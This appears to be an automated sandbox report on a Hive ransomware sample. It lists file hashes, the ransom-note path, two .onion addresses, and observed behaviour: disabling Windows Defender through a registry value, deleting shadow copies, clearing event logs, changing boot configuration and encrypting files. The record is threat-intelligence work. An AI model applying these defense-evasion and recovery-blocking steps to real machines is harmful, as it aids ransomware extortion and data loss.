Analysis
-
max time kernel
153s -
max time network
130s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 16:30
Static task
static1
Behavioral task
behavioral1
Sample
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Resource
win10-en-20211208
General
-
Target
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
-
Size
4.2MB
-
MD5
8c005827cf6f2d6b66d3fe8048387dde
-
SHA1
bfdea3bac03c5e5b1748447232db46cfa964a300
-
SHA256
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372
-
SHA512
2dde409e3048fe4f9a9bca1cc3a07546dc2958e7aefc29e3fe45094bbb5510ba28797a301781eb7559fd361463b004085b7cb758c9e420599504b7e54c620fa7
Malware Config
Extracted
C:\Program Files\7-Zip\wbzc_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 944 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1724 bcdedit.exe 1488 bcdedit.exe -
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\RepairTest.crw => C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\RepairTest.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\SuspendSkip.tif => C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\MountDisable.crw => C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\UnlockSubmit.png => C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\InstallRequest.png => C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\MountDisable.crw.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\SubmitLimit.tiff => C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\SubmitLimit.tiff.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\SuspendSkip.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File renamed C:\Users\Admin\Pictures\HideConvert.tif => C:\Users\Admin\Pictures\HideConvert.tif.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\InstallRequest.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Users\Admin\Pictures\UnlockSubmit.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnssci.dll.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mip.exe.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\wbzc_HOW_TO_DECRYPT.txt 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285410.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\wbzc_HOW_TO_DECRYPT.txt 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\wbzc_HOW_TO_DECRYPT.txt 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\wbzc_HOW_TO_DECRYPT.txt 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\DELETE.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityMergeLetter.Dotx.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_COL.HXC.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\settings.css 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\init.js 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSCONFIG.CHM.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Microsoft Games\Minesweeper\de-DE\Minesweeper.exe.mui.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1052 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2472 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exepid process 108 powershell.exe 2096 powershell.exe 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1800 wevtutil.exe Token: SeBackupPrivilege 1800 wevtutil.exe Token: SeSecurityPrivilege 904 wevtutil.exe Token: SeBackupPrivilege 904 wevtutil.exe Token: SeSecurityPrivilege 572 wevtutil.exe Token: SeBackupPrivilege 572 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1832 wmic.exe Token: SeSecurityPrivilege 1832 wmic.exe Token: SeTakeOwnershipPrivilege 1832 wmic.exe Token: SeLoadDriverPrivilege 1832 wmic.exe Token: SeSystemProfilePrivilege 1832 wmic.exe Token: SeSystemtimePrivilege 1832 wmic.exe Token: SeProfSingleProcessPrivilege 1832 wmic.exe Token: SeIncBasePriorityPrivilege 1832 wmic.exe Token: SeCreatePagefilePrivilege 1832 wmic.exe Token: SeBackupPrivilege 1832 wmic.exe Token: SeRestorePrivilege 1832 wmic.exe Token: SeShutdownPrivilege 1832 wmic.exe Token: SeDebugPrivilege 1832 wmic.exe Token: SeSystemEnvironmentPrivilege 1832 wmic.exe Token: SeRemoteShutdownPrivilege 1832 wmic.exe Token: SeUndockPrivilege 1832 wmic.exe Token: SeManageVolumePrivilege 1832 wmic.exe Token: 33 1832 wmic.exe Token: 34 1832 wmic.exe Token: 35 1832 wmic.exe Token: SeIncreaseQuotaPrivilege 1792 wmic.exe Token: SeSecurityPrivilege 1792 wmic.exe Token: SeTakeOwnershipPrivilege 1792 wmic.exe Token: SeLoadDriverPrivilege 1792 wmic.exe Token: SeSystemProfilePrivilege 1792 wmic.exe Token: SeSystemtimePrivilege 1792 wmic.exe Token: SeProfSingleProcessPrivilege 1792 wmic.exe Token: SeIncBasePriorityPrivilege 1792 wmic.exe Token: SeCreatePagefilePrivilege 1792 wmic.exe Token: SeBackupPrivilege 1792 wmic.exe Token: SeRestorePrivilege 1792 wmic.exe Token: SeShutdownPrivilege 1792 wmic.exe Token: SeDebugPrivilege 1792 wmic.exe Token: SeSystemEnvironmentPrivilege 1792 wmic.exe Token: SeRemoteShutdownPrivilege 1792 wmic.exe Token: SeUndockPrivilege 1792 wmic.exe Token: SeManageVolumePrivilege 1792 wmic.exe Token: 33 1792 wmic.exe Token: 34 1792 wmic.exe Token: 35 1792 wmic.exe Token: SeIncreaseQuotaPrivilege 1792 wmic.exe Token: SeSecurityPrivilege 1792 wmic.exe Token: SeTakeOwnershipPrivilege 1792 wmic.exe Token: SeLoadDriverPrivilege 1792 wmic.exe Token: SeSystemProfilePrivilege 1792 wmic.exe Token: SeSystemtimePrivilege 1792 wmic.exe Token: SeProfSingleProcessPrivilege 1792 wmic.exe Token: SeIncBasePriorityPrivilege 1792 wmic.exe Token: SeCreatePagefilePrivilege 1792 wmic.exe Token: SeBackupPrivilege 1792 wmic.exe Token: SeRestorePrivilege 1792 wmic.exe Token: SeShutdownPrivilege 1792 wmic.exe Token: SeDebugPrivilege 1792 wmic.exe Token: SeSystemEnvironmentPrivilege 1792 wmic.exe Token: SeRemoteShutdownPrivilege 1792 wmic.exe Token: SeUndockPrivilege 1792 wmic.exe Token: SeManageVolumePrivilege 1792 wmic.exe Token: 33 1792 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1748 wrote to memory of 1348 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1348 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1348 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1348 wrote to memory of 580 1348 net.exe net1.exe PID 1348 wrote to memory of 580 1348 net.exe net1.exe PID 1348 wrote to memory of 580 1348 net.exe net1.exe PID 1748 wrote to memory of 1160 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1160 1748 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1748 wrote to memory of 1160 1748 